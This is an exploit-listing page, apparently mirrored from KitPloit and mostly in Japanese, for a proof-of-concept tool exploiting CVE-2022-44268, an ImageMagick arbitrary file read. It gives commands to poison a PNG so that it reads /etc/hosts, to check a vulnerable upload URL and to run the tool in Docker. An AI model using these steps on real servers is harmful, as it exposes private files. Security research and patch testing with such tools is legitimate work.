## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KLJUNOWSKY-CVE-2022-44268
# CVE-2022-44268 🧙♂️
CVE-2022-44268 ImageMagick 任意ファイル読み取り - 概念実証エクスプロイト
### ビデオ 📼
https://youtu.be/quKxwNAMBIA
## 使い方 🛠
画像をポイズンする ☣️
root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Upload poisoned PNG image.
エクスプロイトが成功したか確認する 🗡
root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
## Docker での実行 🐳
ビルド
root@kitploit:~
docker build -t cve-2022-44268 .
実行
root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
## パラメータ 🧰
パラメータ
---
## 連絡先📇
Twitter - Milan Jovic
LinkedIn - Milan Jovic
#### 教育目的のみであり、法律違反や個人的な利益のために使用することはできません。
#### このプロジェクトの作者は、このプロジェクトの資料によって引き起こされる可能性のあるいかなる損害についても責任を負いません。
#### 詳細: https://www.metabaseq.com/imagemagick-zero-days/